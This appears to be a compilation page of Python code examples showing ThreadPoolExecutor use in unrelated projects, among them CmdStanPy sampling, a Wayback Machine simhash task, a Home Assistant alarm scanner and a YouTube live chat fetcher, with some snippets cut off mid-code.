            json.dumps({
                "jsonrpc": "2.0",
                "id": i,
                "method": "account_history_api.get_ops_in_block",
                "params": {
                    "block_num": i,
                    "only_virtual": False
                }
            }), "utf-8") + b"\r\n"

        with ThreadPoolExecutor(max_workers=2) as executor:
            #with ProcessPoolExecutor(max_workers=2) as executor:
            future1 = executor.submit(dpnd_call,
                                      url1,
                                      data=request,
                                      max_tries=max_tries,
                                      timeout=timeout)
            future2 = executor.submit(dpnd_call,
                                      url2,
                                      data=request,
                                      max_tries=max_tries,
                                      timeout=timeout)

        status1, json1 = future1.result()
        status2, json2 = future2.result()

        #status1, json1 = dpnd_call(url1, data=request, max_tries=max_tries, timeout=timeout)
        #status2, json2 = dpnd_call(url2, data=request, max_tries=max_tries, timeout=timeout)

        if status1 == False or status2 == False or json1 != json2:
            print("Difference @block: {}\n".format(i))
            errors += 1

            filename = wdir / Path(str(f_block) + "_" + str(l_block) + ".log")
            try:
                file = filename.open("w")
            except:
                print("Cannot open file:", filename)
                return

            file.write("Difference @block: {}\n".format(i))
            file.write("{} response:\n".format(url1))
            json.dump(json1, file, indent=2, sort_keys=True)
            file.write("\n")
            file.write("{} response:\n".format(url2))
            json.dump(json2, file, indent=2, sort_keys=True)
            file.write("\n")
            file.close()
            print("Compare blocks [{} : {}] break with error".format(
                f_block, l_block))
            return

    print("Compare blocks [{} : {}] finished".format(f_block, l_block))
Example #51
0
    def __init__(self, hass, config, async_add_entities, devices, users):
        self._state = None
        self._sub_state = None
        self._file_path = hass.data[DOMAIN]['port']
        self._available = False
        self._f = None
        self._hass = hass
        self._config = config
        self._model = 'Unknown'
        self._lock = threading.BoundedSemaphore()
        self._stop = threading.Event()
        self._data_flowing = threading.Event()
        self._async_add_entities = async_add_entities
        self.devices = {dev.dev_id: dev for dev in devices}
        self.users = users
        self._is_updating = asyncio.Lock()
        self._activation_packet = b''
        self._mode = '55'
        """ default binary strings for comparing states in d8 packets """
        self._old_bin_string = '0'.zfill(32)
        self._new_bin_string = '0'.zfill(32)
        """Since MQTT is run on separate instance I will connect directly"""
        if hass.data[DOMAIN]['mqtt_external']:
            self._mqtt_enabled = True
            _LOGGER.info("(__init__) MQTT external: %s", self._mqtt_enabled)
        else:
            self._mqtt_enabled = hass.services.has_service('mqtt', 'publish')
            _LOGGER.info("(__init__) MQTT enabled? %s", self._mqtt_enabled)

        if self._mqtt_enabled:
            self._mqtt = hass.components.mqtt
            self._data_topic = hass.data[DOMAIN]['data_topic']

        _LOGGER.info('DeviceScanner.__init__(): serial port: %s',
                     format(self._file_path))

        switcher = {
            "0": b'\x30',
            "1": b'\x31',
            "2": b'\x32',
            "3": b'\x33',
            "4": b'\x34',
            "5": b'\x35',
            "6": b'\x36',
            "7": b'\x37',
            "8": b'\x38',
            "9": b'\x39'
        }

        try:
            """ generate activation packet containing the alarm code, to trigger the right sensor packets """
            packet_code = b''
            for c in hass.data[DOMAIN]['code']:
                packet_code = packet_code + switcher.get(c)
            self._activation_packet = b'\x80\x08\x03\x39\x39\x39' + packet_code

            hass.bus.async_listen('homeassistant_stop', self.shutdown_threads)

            self._io_pool_exc = ThreadPoolExecutor(max_workers=5)
            self._read_loop_future = self._io_pool_exc.submit(self._read_loop)
            self._watcher_loop_keepalive_future = self._io_pool_exc.submit(
                self._watcher_loop_keepalive)
            self._watcher_loop_triggersensorupdate_future = self._io_pool_exc.submit(
                self._watcher_loop_triggersensorupdate)

        except Exception as ex:
            _LOGGER.error('Unexpected error 1: %s', format(ex))
    def get_existing_paths(self):
        """Discovers existing paths in a bucket.

        Faster alternative to using native google.cloud.storage.bucket.Bucket's
        list_blobs() method. Generates all combinations of files using
        FILE_PARAMETERS, and checks if the first file in that combination
        exists. If so, it is added to existing_paths set. Creating a set of the
        first files for each combinations rather than generating a list
        of all 1, 100, 1000, or 10000 files per combination
        (depending on the number of files in the combination)
        saves time and space.

        Returns:
            existing_paths: set containing paths that already exist in given
            bucket
        """
        def _path_exists(path_details):
            """Adds a path to the path_set if it exists.

            Constructs a path based off of the parameters in the path_details
            tuple. Checks that the constructed path exists in the bucket
            defined in the outer function. If so, the path is added to path_set.

            Args:
                path_details (tuple):  of
                    (file_type,
                    num_column,
                    column_type,
                    num_file,
                    table_size)
            """
            (file_type, num_column, column_type,
             num_file, table_size) = path_details
            for compression_type in compression_types[file_type]:
                if compression_type == 'none':
                    extension = file_type
                else:
                    extension = compression_extensions[compression_type]

                path = path_string.format(
                    file_type,
                    compression_type,
                    num_column,
                    column_type,
                    num_file,
                    table_size,
                    extension,
                )
                exists = storage.Blob(
                    bucket=bucket,
                    name=path,
                ).exists(gcs_client)

                if exists:
                    path_set.add(path)

        logging.info('Discovering files from parameters list that exist'
                     ' in bucket {0:s}.'.format(self.bucket_name))
        file_types = self.file_params['fileType']
        compression_types = self.file_params['fileCompressionTypes']
        num_columns = self.file_params['numColumns']
        column_types = self.file_params['columnTypes']
        num_files = self.file_params['numFiles']
        table_sizes = self.file_params['stagingDataSizes']
        compression_extensions = (
            file_constants.FILE_CONSTANTS['compressionExtensions'])
        path_set = set()
        path_string = ('fileType={0:s}/compression={1:s}/numColumns={2:d}/'
                       'columnTypes={3:s}/numFiles={4:d}/tableSize={5:s}/'
                       'file1.{6:s}')

        gcs_client = storage.Client(project=self.project_id)
        bucket = gcs_client.get_bucket(self.bucket_name)

        with ThreadPoolExecutor() as p:
            p.map(
                _path_exists,
                itertools.product(
                    file_types,
                    num_columns,
                    column_types,
                    num_files,
                    table_sizes,
                ))

        logging.info('Done discovering {0:d} existing files.'.format(
            len(path_set)))
        return path_set
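A distilled, self-contained version of the pattern above: map a closure that mutates an outer set across a ThreadPoolExecutor to probe path existence in parallel. The discover/exists names are illustrative, not from the example.

import itertools
from concurrent.futures import ThreadPoolExecutor

def discover(prefixes, suffixes, exists):
    """Collect every prefix/suffix combination for which exists(path) is True."""
    found = set()

    def _check(combo):
        path = "{}/{}".format(*combo)
        if exists(path):      # e.g. a Blob(...).exists() style probe
            found.add(path)   # set.add is atomic under the GIL

    with ThreadPoolExecutor() as pool:
        # list() drains the map iterator so exceptions in _check surface here
        list(pool.map(_check, itertools.product(prefixes, suffixes)))
    return found

# discover(['csv', 'json'], ['small', 'large'], exists=lambda p: 'csv' in p)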
Example #53
0
    def generate_quantities(
        self,
        data: Union[Dict, str] = None,
        mcmc_sample: Union[CmdStanMCMC, List[str]] = None,
        seed: int = None,
        gq_output_dir: str = None,
    ) -> CmdStanGQ:
        """
        Run CmdStan's generate_quantities method which runs the generated
        quantities block of a model given an existing sample.

        This function takes a CmdStanMCMC object and the dataset used to
        generate that sample and calls to the CmdStan ``generate_quantities``
        method to generate additional quantities of interest.

        The ``CmdStanGQ`` object records the command, the return code,
        and the paths to the generate method output csv and console files.
        The output files are written either to a specified output directory
        or to a temporary directory which is deleted upon session exit.

        Output filenames are composed of the model name, a timestamp
        in the form YYYYMMDDhhmm and the chain id, plus the corresponding
        filetype suffix, either '.csv' for the CmdStan output or '.txt' for
        the console messages, e.g. `bernoulli_ppc-201912081451-1.csv`. Output
        files  written to the temporary directory contain an additional
        8-character random string, e.g.
        `bernoulli_ppc-201912081451-1-5nm6as7u.csv`.

        :param data: Values for all data variables in the model, specified
            either as a dictionary with entries matching the data variables,
            or as the path of a data file in JSON or Rdump format.

        :param mcmc_sample: Can be either a CmdStanMCMC object returned by
            CmdStanPy's `sample` method or a list of stan-csv files generated
            by fitting the model to the data using any Stan interface.

        :param seed: The seed for random number generator. Must be an integer
            between ``0`` and ``2^32 - 1``. If unspecified,
            ``numpy.random.RandomState()``
            is used to generate a seed which will be used for all chains.
            *NOTE: Specifying the seed will guarantee the same result for
            multiple invocations of this method with the same inputs.  However
            this will not reproduce results from the sample method given
            the same inputs because the RNG will be in a different state.*

        :param gq_output_dir:  Name of the directory in which the CmdStan output
            files are saved.  If unspecified, files will be written to a
            temporary directory which is deleted upon session exit.

        :return: CmdStanGQ object
        """
        sample_csv_files = []
        sample_drawset = None
        chains = 0

        if isinstance(mcmc_sample, CmdStanMCMC):
            sample_csv_files = mcmc_sample.runset.csv_files
            sample_drawset = mcmc_sample.get_drawset()
            chains = mcmc_sample.chains
        elif isinstance(mcmc_sample, list):
            sample_csv_files = mcmc_sample
        else:
            raise ValueError(
                'mcmc_sample must be either CmdStanMCMC object'
                ' or list of paths to sample csv_files'
            )

        try:
            chains = len(sample_csv_files)
            if sample_drawset is None:  # assemble sample from csv files
                sampler_args = SamplerArgs()
                args = CmdStanArgs(
                    self._name,
                    self._exe_file,
                    chain_ids=[x + 1 for x in range(chains)],
                    method_args=sampler_args,
                )
                runset = RunSet(args=args, chains=chains)
                runset._csv_files = sample_csv_files
                sample_fit = CmdStanMCMC(runset)
                sample_fit._validate_csv_files()
                sample_drawset = sample_fit.get_drawset()
        except ValueError as e:
            raise ValueError(
                'Invalid mcmc_sample, error:\n\t{}\n\t'
                ' while processing files\n\t{}'.format(
                    repr(e), '\n\t'.join(sample_csv_files)
                )
            )

        generate_quantities_args = GenerateQuantitiesArgs(
            csv_files=sample_csv_files
        )
        generate_quantities_args.validate(chains)
        with MaybeDictToFilePath(data, None) as (_data, _inits):
            args = CmdStanArgs(
                self._name,
                self._exe_file,
                chain_ids=[x + 1 for x in range(chains)],
                data=_data,
                seed=seed,
                output_dir=gq_output_dir,
                method_args=generate_quantities_args,
            )
            runset = RunSet(args=args, chains=chains)

            cores_avail = cpu_count()
            cores = max(min(cores_avail - 2, chains), 1)
            with ThreadPoolExecutor(max_workers=cores) as executor:
                for i in range(chains):
                    executor.submit(self._run_cmdstan, runset, i)

            if not runset._check_retcodes():
                msg = 'Error during generate_quantities'
                for i in range(chains):
                    if runset._retcode(i) != 0:
                        msg = '{}, chain {} returned error code {}'.format(
                            msg, i, runset._retcode(i)
                        )
                raise RuntimeError(msg)
            quantities = CmdStanGQ(runset=runset, mcmc_sample=sample_drawset)
            quantities._set_attrs_gq_csv_files(sample_csv_files[0])
        return quantities
    "beauty",
    "hair",
    "apple",
    "macbook",
    "calcukator",
    "pen",
    "glass",
    "note 8",
    "samsung",
    "wallet",
    "watch"
]
products = []
threads = []
THREADING_LIMIT = 444
executor = ThreadPoolExecutor(max_workers=THREADING_LIMIT)
started_threads = queue.Queue(maxsize=1000000)
not_started_threads = queue.Queue(maxsize=1000000)
elastic_search = None


class ScrapingThread(threading.Thread):
    def __init__(self, asin, search_txt, type, url, strt, endd):
        threading.Thread.__init__(self)
        self.asin = asin
        self.search_text = search_txt
        self.type = type
        self.starting = strt
        self.ending = endd
        self.url = url
import ntpath
import time
import os
from tensorflow.keras import backend as K
import argparse
from pathlib import Path
from multiprocessing import Process
from time import time
try:
    from armv7l.openvino.inference_engine import IENetwork, IECore
except:
    from openvino.inference_engine import IENetwork, IECore

from skimage.transform import resize
from concurrent.futures import ThreadPoolExecutor
executor = ThreadPoolExecutor(max_workers=16)

parser = argparse.ArgumentParser()
parser.add_argument('-ip', '--input_path', \
    default='D:/00_NCSU/00_Resources/00_Datasets/oak_NC_MD_grassclover/val/', \
    type=str, help="Input Path")
parser.add_argument("--xml_path",\
                    default="/home/pi/OAK-D-depthai-expts/02-NCS2-mode/FP16/3class_360/3class_360.xml", \
                        help="Path of the deeplabv3plus openvino model.")
parser.add_argument('-pb_path', '--tf_pb_path', \
    default = "D:/00_NCSU/Fall2020/ECE633_IndividualTopics/OAK-D-Weed-Cam/Model/deeplabv3+/models/3_class_model_mobilenet_v3_small_v2.1/3_class_model_mobilenet_v3_small_v2.1_1080x1920.pb", \
        type=str, help='Model Path for tensorflow file')
parser.add_argument('-ms',
                    '--model_size',
                    default=(1080, 1920),
                    type=int,
Example #56
0
    def sample(
        self,
        data: Union[Dict, str] = None,
        chains: Union[int, None] = None,
        cores: Union[int, None] = None,
        seed: Union[int, List[int]] = None,
        chain_ids: Union[int, List[int]] = None,
        inits: Union[Dict, float, str, List[str]] = None,
        warmup_iters: int = None,
        sampling_iters: int = None,
        save_warmup: bool = False,
        thin: int = None,
        max_treedepth: float = None,
        metric: Union[str, List[str]] = None,
        step_size: Union[float, List[float]] = None,
        adapt_engaged: bool = True,
        adapt_delta: float = None,
        fixed_param: bool = False,
        output_dir: str = None,
        save_diagnostics: bool = False,
        show_progress: Union[bool, str] = False
    ) -> CmdStanMCMC:
        """
        Run one or more chains of the NUTS sampler to produce a set of draws
        from the posterior distribution of a model conditioned on some data.

        This function validates the specified configuration, composes a call to
        the CmdStan ``sample`` method and spawns one subprocess per chain to run
        the sampler and waits for all chains to run to completion.
        Unspecified arguments are not included in the call to CmdStan, i.e.,
        those arguments will have CmdStan default values.

        For each chain, the ``CmdStanMCMC`` object records the command,
        the return code, the sampler output file paths, and the corresponding
        console outputs, if any. The output files are written either to a
        specified output directory or to a temporary directory which is deleted
        upon session exit.

        The output filenames are composed of the model name, a timestamp
        in the form YYYYMMDDhhmm and the chain id, plus the corresponding
        filetype suffix, either '.csv' for the CmdStan output or '.txt' for
        the console messages, e.g. `bernoulli-201912081451-1.csv`. Output files
        written to the temporary directory contain an additional 8-character
        random string, e.g. `bernoulli-201912081451-1-5nm6as7u.csv`.


        :param data: Values for all data variables in the model, specified
            either as a dictionary with entries matching the data variables,
            or as the path of a data file in JSON or Rdump format.

        :param chains: Number of sampler chains, should be > 1.

        :param cores: Number of processes to run in parallel. Must be an
            integer between 1 and the number of CPUs in the system.
            If None, it is set automatically to `chains`, but to no more
            than `total_cpu_count - 2`.

        :param seed: The seed for random number generator. Must be an integer
            between ``0`` and ``2^32 - 1``. If unspecified,
            ``numpy.random.RandomState()``
            is used to generate a seed which will be used for all chains.
            When the same seed is used across all chains,
            the chain-id is used to advance the RNG to avoid dependent samples.

        :param chain_ids: The offset for the random number generator, either
            an integer or a list of unique per-chain offsets.  If unspecified,
            chain ids are numbered sequentially starting from 1.

        :param inits: Specifies how the sampler initializes parameter values.
            Initialization is either uniform random on a range centered on 0,
            exactly 0, or a dictionary or file of initial values for some or all
            parameters in the model.  The default initialization behavior will
            initialize all parameter values on range [-2, 2] on the
            _unconstrained_ support.  If the expected parameter values are
            too far from this range, this option may improve adaptation.
            The following value types are allowed:

            * Single number ``n > 0`` - initialization range is [-n, n].
            * ``0`` - all parameters are initialized to 0.
            * dictionary - pairs parameter name : initial value.
            * string - pathname to a JSON or Rdump data file.
            * list of strings - per-chain pathname to data file.

        :param warmup_iters: Number of warmup iterations for each chain.

        :param sampling_iters: Number of draws from the posterior for each
            chain.

        :param save_warmup: When True, sampler saves warmup draws as part of
            the Stan csv output file.

        :param thin: Period between saved samples.

        :param max_treedepth: Maximum depth of trees evaluated by NUTS sampler
            per iteration.

        :param metric: Specification of the mass matrix, either as a
            vector consisting of the diagonal elements of the covariance
            matrix (``diag`` or ``diag_e``) or the full covariance matrix
            (``dense`` or ``dense_e``).

            If the value of the metric argument is a string other than
            ``diag``, ``diag_e``, ``dense``, or ``dense_e``, it must be
            a valid filepath to a JSON or Rdump file which contains an entry
            ``inv_metric`` whose value is either the diagonal vector or
            the full covariance matrix.

            If the value of the metric argument is a list of paths, its
            length must match the number of chains and all paths must be
            unique.

        :param step_size: Initial stepsize for HMC sampler.  The value is either
            a single number or a list of numbers which will be used as the
            global or per-chain initial step_size, respectively.
            The length of the list of step sizes must match the number of
            chains.

        :param adapt_engaged: When True, adapt stepsize and metric.
            *Note: If True, ``warmup_iters`` must be > 0.*

        :param adapt_delta: Adaptation target Metropolis acceptance rate.
            The default value is 0.8.  Increasing this value, which must be
            strictly less than 1, causes adaptation to use smaller step sizes.
            It improves the effective sample size, but may increase the time
            per iteration.

        :param fixed_param: When True, call CmdStan with argument
            "algorithm=fixed_param" which runs the sampler without
            updating the Markov Chain, thus the values of all parameters and
            transformed parameters are constant across all draws and
            only those values in the generated quantities block that are
            produced by RNG functions may change.  This provides
            a way to use Stan programs to generate simulated data via the
            generated quantities block.  This option must be used when the
            parameters block is empty.  Default value is False.

        :param output_dir: Name of the directory to which the CmdStan output
            files are written. If unspecified, output files will be written
            to a temporary directory which is deleted upon session exit.

        :param save_diagnostics: Whether or not to save diagnostics. If True,
            csv output files are written to
            ``<basename>-diagnostic-<chain_id>.csv.``, where ``<basename>``
            is set with ``csv_basename``.

        :param show_progress: Use tqdm progress bar to show sampling progress.
            If show_progress=='notebook' use tqdm_notebook
            (needs nodejs for jupyter).

        :return: CmdStanMCMC object
        """

        if chains is None:
            if fixed_param:
                chains = 1
            else:
                chains = 4
        if chains < 1:
            raise ValueError(
                'chains must be a positive integer value, found {}'.format(
                    chains
                )
            )

        if chain_ids is None:
            chain_ids = [x + 1 for x in range(chains)]
        else:
            if isinstance(chain_ids, int):
                if chain_ids < 1:
                    raise ValueError(
                        'chain_id must be a positive integer value,'
                        ' found {}'.format(chain_ids)
                    )
                offset = chain_ids
                chain_ids = [x + offset + 1 for x in range(chains)]
            else:
                if not len(chain_ids) == chains:
                    raise ValueError(
                        'chain_ids must correspond to number of chains'
                        ' specified {} chains, found {} chain_ids'.format(
                            chains, len(chain_ids)
                        )
                    )
                for i in range(len(chain_ids)):
                    if chain_ids[i] < 1:
                        raise ValueError(
                            'chain_id must be a positive integer value,'
                            ' found {}'.format(chain_ids[i])
                        )

        cores_avail = cpu_count()
        if cores is None:
            cores = max(min(cores_avail - 2, chains), 1)
        if cores < 1:
            raise ValueError(
                'cores must be a positive integer value, found {}'.format(cores)
            )
        if cores > cores_avail:
            self._logger.warning(
                'requested %u cores, only %u available', cores, cpu_count()
            )
            cores = cores_avail

        refresh = None
        if show_progress:
            try:
                import tqdm

                self._logger.propagate = False
            except ImportError:
                self._logger.warning(
                    (
                        'tqdm not installed, progress information is not '
                        'shown. Please install tqdm with '
                        "'pip install tqdm'"
                    )
                )
                show_progress = False

        # TODO:  issue 49: inits can be initialization function

        sampler_args = SamplerArgs(
            warmup_iters=warmup_iters,
            sampling_iters=sampling_iters,
            save_warmup=save_warmup,
            thin=thin,
            max_treedepth=max_treedepth,
            metric=metric,
            step_size=step_size,
            adapt_engaged=adapt_engaged,
            adapt_delta=adapt_delta,
            fixed_param=fixed_param,
        )
        with MaybeDictToFilePath(data, inits) as (_data, _inits):
            args = CmdStanArgs(
                self._name,
                self._exe_file,
                chain_ids=chain_ids,
                data=_data,
                seed=seed,
                inits=_inits,
                output_dir=output_dir,
                save_diagnostics=save_diagnostics,
                method_args=sampler_args,
                refresh=refresh,
            )
            runset = RunSet(args=args, chains=chains)
            pbar = None
            all_pbars = []

            with ThreadPoolExecutor(max_workers=cores) as executor:
                for i in range(chains):
                    if show_progress:
                        if (
                            isinstance(show_progress, str)
                            and show_progress.lower() == 'notebook'
                        ):
                            try:
                                tqdm_pbar = tqdm.tqdm_notebook
                            except ImportError:
                                msg = (
                                    'Cannot import tqdm.tqdm_notebook.\n'
                                    'Functionality is only supported on the '
                                    'Jupyter Notebook and compatible platforms'
                                    '.\nPlease follow the instructions in '
                                    'https://github.com/tqdm/tqdm/issues/394#'
                                    'issuecomment-384743637 and remember to '
                                    'stop & start your jupyter server.'
                                )
                                self._logger.warning(msg)
                                tqdm_pbar = tqdm.tqdm
                        else:
                            tqdm_pbar = tqdm.tqdm

                        # enable dynamic_ncols for advanced users
                        # currently hidden feature
                        dynamic_ncols = os.environ.get(
                            'TQDM_DYNAMIC_NCOLS', 'False'
                        )
                        if dynamic_ncols.lower() in ['0', 'false']:
                            dynamic_ncols = False
                        else:
                            dynamic_ncols = True

                        pbar = tqdm_pbar(
                                desc='Chain {} - warmup'.format(i + 1),
                                position=i,
                                total=1,  # Will set total from Stan's output
                                dynamic_ncols=dynamic_ncols,
                            )

                        all_pbars.append(pbar)

                    executor.submit(self._run_cmdstan, runset, i, pbar)

            # Closing all progress bars
            for pbar in all_pbars:
                pbar.close()

            if show_progress:
                # re-enable logger for console
                self._logger.propagate = True
            if not runset._check_retcodes():
                msg = 'Error during sampling'
                for i in range(chains):
                    if runset._retcode(i) != 0:
                        msg = '{}, chain {} returned error code {}'.format(
                            msg, i, runset._retcode(i)
                        )
                raise RuntimeError(msg)
            mcmc = CmdStanMCMC(runset, fixed_param)
            mcmc._validate_csv_files()
        return mcmc
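A hypothetical usage sketch for the sample() call documented above. Only the keyword arguments come from the docstring; the model object, the data file name, and the summary() call are assumptions that may differ between CmdStanPy releases.

# `model` is assumed to be an already-compiled model object exposing sample();
# 'bernoulli.data.json' is an illustrative data file.
fit = model.sample(
    data='bernoulli.data.json',
    chains=4,
    cores=2,
    seed=1234,
    warmup_iters=500,
    sampling_iters=1000,
    show_progress=True,
)
print(fit.summary())  # assumes the returned CmdStanMCMC exposes summary()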
Example #57
0
def filter_failures(failureThreshold, folder, threads):
    executor = ThreadPoolExecutor(max_workers=threads)
    for root, _dirs, mutations in os.walk(folder):
        for mutation in mutations:
            executor.submit(filter, root, mutation, failureThreshold)
    executor.shutdown(wait=True)
Example #58
0
class Discover(Task):
    """Custom Celery Task class.
    http://docs.celeryproject.org/en/latest/userguide/tasks.html#custom-task-classes
    """
    name = 'Discover'
    task_id = None
    # If a simhash calculation for a URL & year does more than
    # `max_download_errors`, stop it to avoid pointless requests. The captures
    # are not text/html or there is a problem with the WBM.
    max_download_errors = 10
    max_capture_download = 1000000

    def __init__(self, cfg):
        self.simhash_size = cfg['simhash']['size']
        self.simhash_expire = cfg['simhash']['expire_after']
        if self.simhash_size > 512:
            raise Exception('do not support simhash longer than 512')

        headers = {
            'User-Agent': 'wayback-discover-diff',
            'Accept-Encoding': 'gzip,deflate',
            'Connection': 'keep-alive'
        }
        cdx_auth_token = cfg.get('cdx_auth_token')
        if cdx_auth_token:
            headers['cookie'] = 'cdx_auth_token=%s' % cdx_auth_token

        self.http = urllib3.HTTPConnectionPool('web.archive.org',
                                               maxsize=50,
                                               retries=4,
                                               headers=headers)
        self.redis = StrictRedis(connection_pool=BlockingConnectionPool.
                                 from_url(cfg['redis_uri'],
                                          max_connections=50,
                                          timeout=cfg.get('redis_timeout', 10),
                                          decode_responses=True))
        self.tpool = ThreadPoolExecutor(max_workers=cfg['threads'])
        self.snapshots_number = cfg['snapshots']['number_per_year']
        self.download_errors = 0
        # Initialize logger
        self._log = logging.getLogger('wayback_discover_diff.worker')

    def download_capture(self, ts):
        """Download capture data from the WBM and update job status. Return
        data only when it is text or html. On download error, increment download_errors
        which will stop the task after 10 errors. Fetch data up to a limit
        to avoid getting too much (which is unnecessary) and have a consistent
        operation time.
        """
        try:
            statsd_incr('download-capture')
            self._log.info('fetching capture %s %s', ts, self.url)
            res = self.http.request('GET',
                                    '/web/%sid_/%s' % (ts, self.url),
                                    preload_content=False)
            data = res.read(self.max_capture_download)
            ctype = res.headers.get('content-type')
            res.release_conn()
            if ctype:
                ctype = ctype.lower()
                if "text" in ctype or "html" in ctype:
                    return data
        except HTTPError as exc:
            self.download_errors += 1
            self._log.error('cannot fetch capture %s %s',
                            ts,
                            self.url,
                            exc_info=1)
        return None

    def start_profiling(self, snapshot, index):
        """Used for performance testing only.
        """
        cProfile.runctx('self.get_calc(snapshot, index)',
                        globals=globals(),
                        locals=locals(),
                        filename='profile.prof')

    def get_calc(self, capture):
        """if a capture with an equal digest has been already processed,
        return cached simhash and avoid redownloading and processing. Else,
        download capture, extract HTML features and calculate simhash.
        If there are already too many download failures, return None without
        any processing to avoid pointless requests.
        Return None if any problem occurs (e.g. HTTP error or cannot calculate)
        """
        (timestamp, digest) = capture.split(' ')
        simhash_enc = self.seen.get(digest)
        if simhash_enc:
            self._log.info("already seen %s", digest)
            return (timestamp, simhash_enc)

        if self.download_errors >= self.max_download_errors:
            self._log.error(
                '%d consecutive download errors fetching %s captures',
                self.download_errors, self.url)
            return None

        response_data = self.download_capture(timestamp)
        if response_data:
            data = extract_html_features(response_data)
            if data:
                statsd_incr('calculate-simhash')
                self._log.info("calculating simhash")
                simhash = calculate_simhash(data,
                                            self.simhash_size,
                                            hashfunc=custom_hash_function)
                # This encoding is necessary to store simhash data in Redis.
                simhash_enc = base64.b64encode(
                    pack_simhash_to_bytes(simhash, self.simhash_size))
                self.seen[digest] = simhash_enc
                return (timestamp, simhash_enc)
        return None

    def run(self, url, year, created):
        """Run Celery Task.
        """
        self.job_id = self.request.id
        self.url = url_fix(url)
        time_started = datetime.now()
        self._log.info('Start calculating simhashes.')
        self.download_errors = 0
        if not self.url:
            self._log.error('did not give url parameter')
            return {'status': 'error', 'info': 'URL is required.'}
        if not year:
            self._log.error('did not give year parameter')
            return {'status': 'error', 'info': 'Year is required.'}
        # fetch captures
        self.update_state(
            state='PENDING',
            meta={'info': 'Fetching %s captures for year %s' % (url, year)})
        resp = self.fetch_cdx(url, year)
        if resp.get('status') == 'error':
            return resp
        captures = resp.get('captures')
        total = len(captures)
        self.seen = dict()
        # calculate simhashes in parallel
        i = 0
        final_results = {}
        for res in self.tpool.map(self.get_calc, captures):
            if not res:
                continue
            (timestamp, simhash) = res
            if simhash:
                final_results[timestamp] = simhash
            if i % 10 == 0:
                self.update_state(state='PENDING',
                                  meta={
                                      'info':
                                      'Processed %d out of %d captures.' %
                                      (i, total)
                                  })
            i += 1

        self._log.info('%d final results for %s and year %s.',
                       len(final_results), self.url, year)
        if final_results:
            try:
                urlkey = surt(self.url)
                self.redis.hmset(urlkey, final_results)
                self.redis.expire(urlkey, self.simhash_expire)
            except RedisError as exc:
                self._log.error('cannot write simhashes to Redis for URL %s',
                                self.url,
                                exc_info=1)

        duration = (datetime.now() - time_started).seconds
        self._log.info('Simhash calculation finished in %.2fsec.', duration)
        return {'duration': str(duration)}

    def fetch_cdx(self, url, year):
        """Make a CDX query for timestamp and digest for a specific year.
        """
        try:
            self._log.info('fetching CDX of %s for year %s', url, year)
            # Collapse captures by timestamp to get 3 captures per day (max).
            # TODO increase that in the future when we can handle more captures.
            # It's necessary to reduce the huge number of captures some websites
            # have (e.g. twitter.com has 167k captures for 2018). Get only 2xx captures.
            fields = {
                'url': url,
                'from': year,
                'to': year,
                'statuscode': 200,
                'fl': 'timestamp,digest',
                'collapse': 'timestamp:9'
            }
            if self.snapshots_number != -1:
                fields['limit'] = self.snapshots_number
            response = self.http.request('GET', '/web/timemap', fields=fields)
            self._log.info('finished fetching timestamps of %s for year %s',
                           url, year)
            if response.status == 200:
                if not response.data:
                    self._log.info('no captures found for %s %s', url, year)
                    urlkey = surt(url)
                    self.redis.hset(urlkey, year, -1)
                    self.redis.expire(urlkey, self.simhash_expire)
                    return {
                        'status': 'error',
                        'info': 'No captures of %s for year %s' % (url, year)
                    }
                captures_txt = response.data.decode('utf-8')
                captures = captures_txt.strip().split("\n")
                if captures:
                    return {'status': 'success', 'captures': captures}
                return {
                    'status': 'error',
                    'info': 'No captures of %s for year %s' % (url, year)
                }
        except (ValueError, HTTPError) as exc:
            self._log.error('invalid CDX query response for %s %s',
                            url,
                            year,
                            exc_info=1)
            return {'status': 'error', 'info': str(exc)}
        except RedisError as exc:
            self._log.error('error connecting with Redis for url %s year %s',
                            url,
                            year,
                            exc_info=1)
            return {'status': 'error', 'info': str(exc)}
Example #59
0
def run_io_tasks_in_parallel(tasks):
    with ThreadPoolExecutor() as executor:
        running_tasks = [executor.submit(task) for task in tasks]
        for running_task in running_tasks:
            running_task.result()
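A brief usage sketch for the helper above; the two task functions are illustrative stand-ins for real I/O-bound work, not part of the example.

import time

def slow_disk_read():
    time.sleep(0.5)
    return "read done"

def slow_api_call():
    time.sleep(0.5)
    return "call done"

run_io_tasks_in_parallel([slow_disk_read, slow_api_call])  # ~0.5 s wall time, not 1 s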
Example #60
0
class LiveChat:
    '''
    LiveChat object fetches chat data and stores it
    in a buffer with a ThreadPoolExecutor.

    Parameter
    ---------
    video_id : str

    seektime : int
        start position of fetching chat (seconds).
        This option is valid for archived chat only.
        If negative value, chat data posted before the start of the broadcast
        will be retrieved as well.

    processor : ChatProcessor

    buffer : Buffer
        buffer of chat data fetched background.

    interruptable : bool
        Allows keyboard interrupts.
        Set this parameter to False if your own threading program causes
        the problem.

    callback : func
        function called periodically from _listen().

    done_callback : func
        function called when listener ends.

    direct_mode : bool
        If True, invoke specified callback function without using buffer.
        callback is required. If not, IllegalFunctionCall will be raised.

    force_replay : bool
        force to fetch archived chat data, even if specified video is live.

    topchat_only : bool
        If True, get only top chat.

    Attributes
    ---------
    _executor : ThreadPoolExecutor
        This is used for _listen() loop.

    _is_alive : bool
        Flag to stop getting chat.
    '''

    _setup_finished = False

    def __init__(self,
                 video_id,
                 seektime=-1,
                 processor=DefaultProcessor(),
                 buffer=None,
                 interruptable=True,
                 callback=None,
                 done_callback=None,
                 direct_mode=False,
                 force_replay=False,
                 topchat_only=False,
                 logger=config.logger(__name__)):
        self._video_id = extract_video_id(video_id)
        self.seektime = seektime
        if isinstance(processor, tuple):
            self.processor = Combinator(processor)
        else:
            self.processor = processor
        self._buffer = buffer
        self._callback = callback
        self._done_callback = done_callback
        self._executor = ThreadPoolExecutor(max_workers=2)
        self._direct_mode = direct_mode
        self._is_alive = True
        self._is_replay = force_replay
        self._parser = Parser(is_replay=self._is_replay)
        self._pauser = Queue()
        self._pauser.put_nowait(None)
        self._first_fetch = True
        self._fetch_url = "live_chat/get_live_chat?continuation="
        self._topchat_only = topchat_only
        self._event = Event()
        self._logger = logger
        self.exception = None
        if interruptable:
            signal.signal(signal.SIGINT, lambda a, b: self.terminate())
        self._setup()

    def _setup(self):
        # An exception is raised when direct mode is true and no callback is set.
        if self._direct_mode:
            if self._callback is None:
                raise exceptions.IllegalFunctionCall(
                    "When direct_mode=True, callback parameter is required.")
        else:
            # Create a default buffer if `direct_mode` is False and buffer is not set.
            if self._buffer is None:
                self._buffer = Buffer(maxsize=20)
            # If the `callback` param is specified, start a loop task that
            # calls the callback function.
            if self._callback is not None:
                self._executor.submit(self._callback_loop, self._callback)
